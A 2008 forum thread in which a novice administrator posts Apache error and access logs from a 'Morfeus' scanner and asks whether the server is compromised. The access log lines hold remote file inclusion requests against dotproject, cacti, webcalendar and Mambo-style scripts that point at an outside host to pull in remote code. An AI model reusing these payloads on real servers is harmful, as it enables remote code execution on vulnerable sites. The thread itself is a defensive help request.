Is someone breaking into my system?

**greenhorn** · 07-12-2008

Found this block in my error logs:

Code:

[Fri Jul 11 22:16:50 2008] [error] [client Ip removed] script '/var/www/index.php' not found or unable to stat
[Fri Jul 11 22:16:50 2008] [error] [client ip removed] script '/var/www/index.php' not found or unable to stat
[Fri Jul 11 22:16:50 2008] [error] [client ip removed] File does not exist: /var/www/dotproject
[Fri Jul 11 22:16:50 2008] [error] [client ip removed] File does not exist: /var/www/dotproject
[Fri Jul 11 22:16:50 2008] [error] [client ipremoved] File does not exist: /var/www/cacti
[Fri Jul 11 22:16:50 2008] [error] [clientip removed] File does not exist: /var/www/cacti
[Fri Jul 11 22:16:50 2008] [error] [client ip removed] script '/var/www/index2.php' not found or unable to stat
[Fri Jul 11 22:16:50 2008] [error] [client ip removed] script '/var/www/index2.php' not found or unable to stat
[Fri Jul 11 22:16:51 2008] [error] [client ip removed] File does not exist: /var/www/admin
[Fri Jul 11 22:16:51 2008] [error] [client ip removed] File does not exist: /var/www/admin
[Fri Jul 11 22:16:52 2008] [error] [client ip removed] File does not exist: /var/www/webcalendar
[Fri Jul 11 22:16:52 2008] [error] [client ip removed] File does not exist: /var/www/webcalendar
[Sat Jul 12 01:27:20 2008] [error] [client ip removed] script '/var/www/index.php' not found or unable to stat
[Sat Jul 12 01:27:20 2008] [error] [client ip removed] script '/var/www/index.php' not found or unable to stat
[Sat Jul 12 01:27:20 2008] [error] [client ip removed] File does not exist: /var/www/dotproject
[Sat Jul 12 01:27:20 2008] [error] [client ip removed] File does not exist: /var/www/dotproject
[Sat Jul 12 01:27:20 2008] [error] [client ip removed] File does not exist: /var/www/cacti
[Sat Jul 12 01:27:20 2008] [error] [client ip removed] File does not exist: /var/www/cacti
[Sat Jul 12 01:27:20 2008] [error] [client ip removed] script '/var/www/index2.php' not found or unable to stat
[Sat Jul 12 01:27:20 2008] [error] [client ip removed] script '/var/www/index2.php' not found or unable to stat
[Sat Jul 12 01:27:21 2008] [error] [client ip removed] File does not exist: /var/www/admin
[Sat Jul 12 01:27:21 2008] [error] [client ip removed] File does not exist: /var/www/admin
[Sat Jul 12 01:27:21 2008] [error] [client ip removed] File does not exist: /var/www/webcalendar
[Sat Jul 12 01:27:22 2008] [error] [client ip removed] File does not exist: /var/www/webcalendar

Not one of those folders, IE, Dotproject, Caci, ect, exists in my server, nor have they ever. Is someone on some sort of a fishing expedition here? Why would someone look for /var/www/admin?
How could I make sure that this person does NOT get to see anything other then the /var/www folder? Or that he doesn't have permissions to write to any of my files??

Here is also a block from my access logs. Same IP, same day, same time,

Code:

IP removed - - [12/Jul/2008:01:27:20 -0500] "GET /index.php?id=http://mystres.com/1.gif?/ HTTP/1.1" 404 303 "-" "Morfeus ****ing Scanner"
IP removed - - [12/Jul/2008:01:27:20 -0500] "GET /index.php?id=http://mystres.com/1.gif?/ HTTP/1.1" 404 303 "-" "Morfeus ****ing Scanner"
"GET /dotproject/includes/db_adodb.php?baseDir=http://mystres.com/1.gif?/ HTTP/1.1" 404 326 "-" "Morfeus ****ing Scanner"
[12/Jul/2008:01:27:20 -0500] "GET /dotproject/includes/db_adodb.php?baseDir=http://mystres.com/1.gif?/ HTTP/1.1" 404 326 "-" "Morfeus ****ing Scanner"
[12/Jul/2008:01:27:20 -0500] "GET /cacti/include/config_settings.php?config[include_path]=http://mystres.com/1.gif?/ HTTP/1.1" 404 327 "-" "Morfeus Fuc
[12/Jul/2008:01:27:20 -0500] "GET /cacti/include/config_settings.php?config[include_path]=http://mystres.com/1.gif?/ HTTP/1.1" 404 327 "-" "Morfeus Fuc
[12/Jul/2008:01:27:20 -0500] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mystres.com/1.gif
[12/Jul/2008:01:27:20 -0500] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mystres.com/1.gif
[12/Jul/2008:01:27:21 -0500] "GET /admin/business_inc/saveserver.php?thisdir=http://mystres.com/1.gif?/ HTTP/1.1" 404 327 "-" "Morfeus ****ing Scanner"
[12/Jul/2008:01:27:21 -0500] "GET /admin/business_inc/saveserver.php?thisdir=http://mystres.com/1.gif?/ HTTP/1.1" 404 327 "-" "Morfeus ****ing Scanner"
[12/Jul/2008:01:27:21 -0500] "GET /webcalendar/tools/send_reminders.php?includedir=http://mystres.com/1.gif?/ HTTP/1.1" 404 330 "-" "Morfeus ****ing Sc
[12/Jul/2008:01:27:22 -0500] "GET /webcalendar/tools/send_reminders.php?includedir=http://mystres.com/1.gif?/ HTTP/1.1" 404 330 "-" "Morfeus ****ing Sc
[12/Jul/2008:01:27:22 -0500] "GET / HTTP/1.1" 200 2935 "-" "Morfeus ****ing Scanner"
[12/Jul/2008:01:27:22 -0500] "GET / HTTP/1.1" 200 2935 "-" "Morfeus ****ing Scanner"

What's going on here, anyway? I'm hopelessly confused. Sorry for posting the "bad language" int he code, but ...

**MikeTbob** · 07-12-2008

Check this link, sounds kinda scary to me.
http://blog.yaay.us/?cat=8

**greenhorn** · 07-12-2008

Yipes!

Ok, so is there any way of checking to see if this attach was "successful" in engaging my server to serve these functions?

I'm quite green at linux, especially security stuff, so any help here would be very much appreciated!

Thank you for your link, MikeTbob.

Another question is, I haven't even "launched" my webiste, it's not really on public internet yet. How has this scanner then found my server? Is it possible that it's embedded on a different server on my LAN? (We do have an Ubuntu set up)

Thread Tools

Display

Is someone breaking into my system?

Posting Permissions